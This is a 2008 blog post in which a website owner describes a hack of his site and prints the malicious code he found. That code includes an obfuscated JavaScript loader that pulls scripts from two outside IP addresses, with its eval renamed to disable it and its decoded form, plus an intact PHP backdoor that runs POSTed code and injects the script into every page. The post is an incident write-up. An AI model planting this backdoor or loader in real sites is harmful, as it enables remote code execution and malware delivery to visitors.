Thursday, December 18, 2008

Hacked... again....



Hackers claiming to be Muslims from Turkey hacked the site the other day so I've just spent the evening reloading most of the files form backup. Although only a couple of files were visibly changed almost every html file and random PHP files had code inserted which caused any number of unknown activities.

What I don't understand is that if you are going to go to the trouble of hacking a site and then to stealthily insert code which obviously does some sort of action of benefit to the perpetrator, why would you write your name on the index page as a red flag to say this site has been hacked? Surely If I was a hacker I would just insert the code quietly and then nobody would know it was their unless they did a full site compare. Unless you wanted a site to look like it had been hacked by someone else..... hmmmm

Anyway I'm off to review my file permissions and php code across the site... and sift through some log files ;)

[EDIT:] Here is the javascript code that was pacthed into all my webpages. I have renamed the 'eval' function to disable the action and broken into lines

if(typeof(yahoo_counter)!=typeof(1))evalDISABLED(unescape('%2F%2F%3Cdi%76#%20!%73|%74%79%6C%65%3D$
%64%69~%73`%70l@%61y`%3A`n$%6F`%6E|e%3E\n#do#%63$%75!%6D%65$%6E|%74`%2E%77#%72i@%74%65%28$%22%3C
%2F%74|%65%78%74a#%72e&a|%3E")%3B%76`%61@r%20i|%2C%5F|%2C%61@%3D%5B#%2278|.|1&%310%2E@17@5`%2E&%321
!%22~,%2219!%35~.&2#4~.%37!6`.2#%35!1"@%5D~;_%3D%31~%3Bi@f$%28%64&%6F%63&%75&%6D%65n&t.c&%6F#ok%69
%65.%6D`a%74#c`%68~(%2F%5C$%62#hg#%66%74%3D#1/&%29=~%3D%6E#u@%6C`l%29!f%6Fr&%28$%69&=|%30%3B#
%69#%3C%32%3B!i|%2B!+#%29doc&%75%6D#%65&%6Et%2Ew&%72%69!t#e@(#"!%3C%73|cr#i%70t%3E`%69!%66~(#_%29$
%64@%6Fcu~%6D@e%6E|t%2E%77`rit%65%28%5C%22!%3C#%73%63%72!ip&t%20~id=%5F&"%2Bi!+"_`%20s`%72c=//%22~
+`%61@%5B$%69%5D`+#%22#/%63`%70$%2F%3F&%22&%2B@n$%61%76$%69%67`%61%74!%6F`r#%2Eap!%70#%4E`%61!
m&e!.&%63&h`%61!rA%74!(0`)@%2B"%3E%3C~%5C%5C%2F!%73%63r!%69%70!t!%3E#%5C"&)~%3C%5C/s`%63ri%70%74%3E$
%22%29@;\n%2F@/&%3C%2F%64|%69%76#%3E').replace(/#|\!|@|~|`|\&|\$|\|/g,""));var yahoo_counter=1;


The un-obfuscated version is as follows

//<div style=display:none>


document.write("</textarea>");var i,_,a=["78.110.175.21","195.24.76.251"];
_=1;
if(document.cookie.match(/\bhgft=1/)==null)
for(i=0;i<2;i++)document.write("<script>if(_)document.write(\"<script id=_"+i+"_
src=//"+a[i]+"/cp/?"+navigator.appName.charAt(0)+"><\\/script>\")<\/script>");


//</div>



Those two IP addresses are managed by

person: Alexander A Solovyov
address: LIMT Group Ltd.
address: Karpinskogo 97a
address: Moscow
address: 111423
address: Russian Federation
phone: +7 342 2763167

and

person: Andy BIERLAIR
address: root eSolutions
address: 35, rue John F. Kennedy
address: L-7327 Steinsel
phone: +352 20.500
fax-no: +352 20.500.500
nic-hdl: AB99-RIPE


The PHP pages were tagged with


if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwd
CBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIAppZih0eXBlb2YoeWFob29fY291bnRlcikhPXR5c
GVvZigxKSlldmFsKHVuZXNjYXBlKCclMkYlMkYlM0NkaSU3NiMlMjAhJTczfCU3NCU3OSU2QyU2NSUzRCQlNjQlNjl+JTczYCU3MGxAJ
TYxeWAlM0FgbiQlNkZgJTZFfGUlM0VcbiNkbyMlNjMkJTc1ISU2RCU2NSQlNkV8JTc0YCUyRSU3NyMlNzJpQCU3NCU2NSUyOCQlMjIl
M0MlMkYlNzR8JTY1JTc4JTc0YSMlNzJlJmF8JTNFIiklM0IlNzZgJTYxQHIlMjBpfCUyQyU1RnwlMkMlNjFAJTNEJTVCIyUyMjc4fC58MSYlM
zEwJTJFQDE3QDVgJTJFJiUzMjEhJTIyfiwlMjIxOSElMzV+LiYyIzR+LiUzNyE2YC4yIyUzNSExIkAlNUR+O18lM0QlMzF+JTNCaUBmJCUyO
CU2NCYlNkYlNjMmJTc1JiU2RCU2NW4mdC5jJiU2RiNvayU2OSU2NS4lNkRgYSU3NCNjYCU2OH4oJTJGJTVDJCU2MiNoZyMlNjYlNzQl
M0QjMS8mJTI5PX4lM0QlNkUjdUAlNkNgbCUyOSFmJTZGciYlMjgkJTY5Jj18JTMwJTNCIyU2OSMlM0MlMzIlM0IhaXwlMkIhKyMlMjlkb2
MmJTc1JTZEIyU2NSYlNkV0JTJFdyYlNzIlNjkhdCNlQCgjIiElM0MlNzN8Y3IjaSU3MHQlM0VgJTY5ISU2Nn4oI18lMjkkJTY0QCU2RmN1fi
U2REBlJTZFfHQlMkUlNzdgcml0JTY1JTI4JTVDJTIyISUzQyMlNzMlNjMlNzIhaXAmdCUyMH5pZD0lNUYmIiUyQmkhKyJfYCUyMHNgJTc
yYz0vLyUyMn4rYCU2MUAlNUIkJTY5JTVEYCsjJTIyIy8lNjNgJTcwJCUyRiUzRiYlMjImJTJCQG4kJTYxJTc2JCU2OSU2N2AlNjElNzQhJTZG
YHIjJTJFYXAhJTcwIyU0RWAlNjEhbSZlIS4mJTYzJmhgJTYxIXJBJTc0ISgwYClAJTJCIiUzRSUzQ34lNUMlNUMlMkYhJTczJTYzciElNjklNzAh
dCElM0UjJTVDIiYpfiUzQyU1Qy9zYCU2M3JpJTcwJTc0JTNFJCUyMiUyOUA7XG4lMkZALyYlM0MlMkYlNjR8JTY5JTc2IyUzRScpLnJlcGx
hY2UoLyN8XCF8QHx+fGB8XCZ8XCR8XHwvZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY
3JpcHQ+Cg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'\"][^\s\'\"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=='),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();


That whole base64 encoded things boils down to the same javascript seen above. I have emailed the ISP managers for the IP addresses pointed at by the code and they can investigate further should they wish.


What does the code do ? Well it goes to the to ip addresses and runs the code found at
http://78.110.175.21/cp/?I which is currently :
_=0;for(i=0;i<9;i++){var d=document.getElementById("_"+i
+"_");if(d)d.src=""}evalDISABLED(unescape('%2F/%4A`u#%73!%74%20~%66~u@c#k`%20#of`%66#.
%2E%2E`@%3C#d#%69v%20st%79%6Ce~=@d%69@%73#pl%61~y%3A~n`%6F@n%65$%3E\n~%76@ar|
%20%74@%3D%6E@%65w@ %44$a!t!e#%281#%32@29%39|7$308@30%300);%64!%6F$%63~%75me$n$
%74!.@%63o`ok|%69~e=%22h%67!%66#%74|%3D%31`;$%20#e%78@%70|%69#%72%65`s=%22#%2B
%74|%2E@t%6FG%4D%54!St$r`i`%6E`%67#(%29#+|"; %70%61|%74%68@%3D/%22@;\n%2F@%2F!
%3C/%64`iv|%3E').replace(/@|\!|~|\?|#|\$|`|\|/g,""));


which is un-obfuscated to :

//Just fuck off...&lt;div style=display:none&gt;
var t=new Date(1229972812000);document.cookie="hgft=1; expires="+t.toGMTString()+"; path=/";
//&lt;/div&gt;


which simply saves a cookie. But I would assume that later the hacker would replace this code with something more worthwhile.

1 Comments:

At 4:38 PM, Blogger fdask said...

Thanks for the shared info! Someone I know discovered some strange Javascript executing on a login page to one of their sites earlier today.

After some unescaping, I found a few terms which led me here.

Did you ultimately discover how the culprits were able to get into your site and drop the code bits?

 

Post a Comment

<< Home